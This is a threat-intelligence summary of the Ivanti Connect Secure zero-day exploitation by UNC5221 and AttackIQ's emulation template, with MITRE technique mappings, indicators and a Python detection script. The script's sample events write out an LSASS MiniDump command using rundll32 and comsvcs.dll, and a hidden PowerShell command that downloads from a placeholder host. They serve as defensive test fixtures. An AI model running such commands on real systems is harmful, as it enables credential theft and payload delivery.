Keypoints
- Ivanti disclosed CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) affecting Connect Secure and Policy Secure appliances.
- Researchers observed immediate scanning activity and requests for non-public file paths on vulnerable Ivanti appliances before widespread exploitation reports emerged.
- Adversary UNC5221 (UTA0178) exploited the vulnerabilities, trojanized legitimate device files, and deployed multiple custom malware families to maintain persistence.
- AttackIQ released an assessment template that emulates post-exploit TTPs (discovery, collection, credential access, lateral movement, C2/ingress) to validate controls and detection pipelines.
- Emulated techniques include nmap network scanning, 7zip archiving of collected data, LSASS memory dumping via rundll32/comsvcs MiniDump, RDP/SSH lateral movement, ingress tool transfer, and internet connection discovery via curl.
- Recommended detections include hunting for comsvcs executions targeting LSASS and PowerShell/cmd usage patterns that indicate remote payload download (e.g., IWR/Invoke-WebRequest with DownloadData and Hidden flags).
MITRE Techniques
- [T1046] Network Service Discovery – Uses nmap to scan for hosts with open SMB, RDP, or LDAP ports to identify remotely accessible hosts; quote [‘This scenario uses nmap for scanning hosts that have open ports for Samba File Sharing (SMB), Remote Desktop (RDP), or Active Directory (LDAP) that would identify remotely accessible hosts to the attacker.’]
- [T1560.001] Archive Collected Data: Archive via Utility – Compresses specified input files into a .7z archive using the 7zip binary to exfiltrate/collect data; quote [‘This scenario compresses all the specified input files with the given compression level to a .7z archive by executing the 7zip binary file.’]
- [T1003.001] OS Credential Dumping: LSASS Memory – Dumps LSASS memory via rundll32.exe calling comsvcs.dll MiniDump to capture credential materials for later extraction; quote [‘Uses rundll32.exe with comsvcs.dll to call the MiniDump export that will dump the LSASS process memory to disk.’]
- [T1021.001] Remote Services: Remote Desktop Protocol – Uses RDP to remotely connect to other assets with stolen credentials for lateral movement; quote [‘This scenario attempts to remotely connect to another accessible asset with stolen credentials.’]
- [T1021.004] Remote Services: SSH – Initiates an outbound SSH connection (to an AttackIQ-hosted server in testing) to exercise outbound restrictions relevant to lateral movement or C2; quote [‘This scenario will initiate an SSH connection to an external AttackIQ-hosted server to exercise restrictions in outbound traffic.’]
- [T1105] Ingress Tool Transfer – Downloads additional payloads to memory and/or disk to deliver malware stages and test network/endpoint controls; quote [‘This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.’]
- [T1016.001] Internet Connection Discovery – Uses curl to request a 3rd-party service that returns the external IP to validate internet access from the compromised host; quote [‘This scenario validates if the system is capable of accessing the internet by using the native curl utility to make a request to a legitimate 3rd party site that reports the external IP address used to access the domain.’]
- [T1003.003] OS Credential Dumping: NTDS (suggested expansion) – Attempts to dump NTDS.dit and registry hives using ntdsutil.exe on a Domain Controller to extract Active Directory credentials; quote [‘This scenario will attempt to execute the ntdsutil.exe utility to dump the NTDS.dit file along with the SYSTEM and SECURITY registry hives.’]
- [T1110.001] Brute Force: Password Spraying (suggested expansion) – Simulates SMB password spraying against port 445 to emulate credential brute-force attempts; quote [‘This scenario will simulate an SMB password spraying attack against an SMB server on port 445/TCP.’]
Indicators of Compromise
- [CVE] Vulnerability identifiers – CVE-2023-46805, CVE-2024-21887 (vulnerabilities exploited to achieve auth bypass and command injection)
- [File / Binary Names] binaries and DLLs referenced in techniques – rundll32.exe, comsvcs.dll (used to dump LSASS memory)
- [Database / File] Active Directory artifacts – NTDS.dit, ntdsutil.exe (dumping suggested for Domain Controllers)
- [Utilities / Commands] tooling used for collection and discovery – 7zip (7z), curl (and examples of PowerShell IWR/Invoke-WebRequest with DownloadData and Hidden flags)
- [File integrity] appliance file tampering context – mismatched/trojanized legitimate appliance files reported by customers (no filenames provided)
Researchers observed immediate scanning and file-path probing of Ivanti Connect Secure devices following disclosure of CVE-2023-46805 and CVE-2024-21887, and customers reported mismatched (trojanized) files on appliances. The actor UNC5221 leveraged the two vulnerabilities to gain initial access, then maintained persistence by replacing or trojanizing legitimate binaries and deploying custom malware families.
AttackIQ’s assessment template reproduces the post-exploit TTPs to validate detection and prevention controls: network discovery via nmap to identify SMB/RDP/LDAP services; data collection by compressing artifacts into .7z archives using the 7zip binary; credential harvesting by dumping LSASS memory with rundll32.exe/comsvcs.dll (MiniDump); lateral movement using RDP and outbound SSH; ingress/tool transfer tests that download payloads to memory or disk; and internet-connection discovery using curl to an external IP service. Recommended expansion scenarios include dumping NTDS.dit with ntdsutil.exe on domain controllers and simulating SMB password spraying to cover credential brute-force behaviors.
Detection guidance emphasizes monitoring for comsvcs/rundll32 executions targeting LSASS (e.g., Process Name == (comsvcs) and Command Line CONTAINS (‘lsass’)) and identifying native-utility download patterns (e.g., Process Name == (Cmd.exe OR Powershell.exe) with Command Line CONTAINS ((‘IWR’ OR ‘Invoke-WebRequest’) AND ‘DownloadData’ AND ‘Hidden’)). Organizations should first apply Ivanti’s patch and detection recommendations, then use the assessment template to validate controls and refine detections based on generated telemetry.
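The two hunts above, written as detection logic and run over constructed process-creation events. This is an added example, not AttackIQ's or Ivanti's code; the event fields (`process_name`, `command_line`) and the sample telemetry are assumptions made for the example.

```python
import re

# Assumed event shape (constructed for this example, not a real telemetry schema):
# {"process_name": "...", "command_line": "..."}

DOWNLOAD_CMDLET = re.compile(r"\b(iwr|invoke-webrequest)\b", re.IGNORECASE)

def matches_lsass_minidump(event):
    """Hunt 1: comsvcs.dll MiniDump targeting LSASS (T1003.001).
    The page keys on a process name of comsvcs; because comsvcs.dll is a
    library loaded by rundll32.exe, the command line is checked as well.
    Caveat: the match relies on 'lsass' appearing in the command line; enrich
    with the target PID's image name from your EDR rather than trusting names."""
    proc = event.get("process_name", "").lower()
    cmd = event.get("command_line", "").lower()
    return "comsvcs" in (proc + " " + cmd) and "lsass" in cmd

def matches_native_download(event):
    """Hunt 2: cmd/PowerShell download pattern (T1105):
    (IWR OR Invoke-WebRequest) AND DownloadData AND Hidden."""
    proc = event.get("process_name", "").lower()
    if proc not in ("cmd.exe", "powershell.exe"):
        return False
    cmd = event.get("command_line", "")
    lc = cmd.lower()
    return bool(DOWNLOAD_CMDLET.search(cmd)) and "downloaddata" in lc and "hidden" in lc

RULES = [("lsass_minidump", matches_lsass_minidump),
         ("native_download", matches_native_download)]

def scan_events(events):
    """Return [(event_index, rule_name), ...] for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES:
            if rule(ev):
                hits.append((i, name))
    return hits

# Constructed sample telemetry (not real logs): two benign events, two that match.
SAMPLE_EVENTS = [
    {"process_name": "rundll32.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"process_name": "rundll32.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 624 C:\temp\lsass.dmp full"},
    {"process_name": "powershell.exe",
     "command_line": "powershell.exe -Command Invoke-WebRequest https://example.invalid/updates.json"},
    {"process_name": "powershell.exe",
     "command_line": "powershell.exe -WindowStyle Hidden -c \"Invoke-WebRequest http://example.invalid/s2 -OutFile s2.bin; (New-Object Net.WebClient).DownloadData('http://example.invalid/s2')\""},
]

if __name__ == "__main__":
    for idx, rule in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx]['command_line']}")
```

Running the block flags only events 1 and 3; the benign rundll32 control-panel launch and the plain Invoke-WebRequest without DownloadData/Hidden pass through, which is the false-positive boundary these string-based hunts draw.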
Read more: https://www.attackiq.com/2024/02/07/response-to-ivantis-zero-day-vulnerability-exploitation/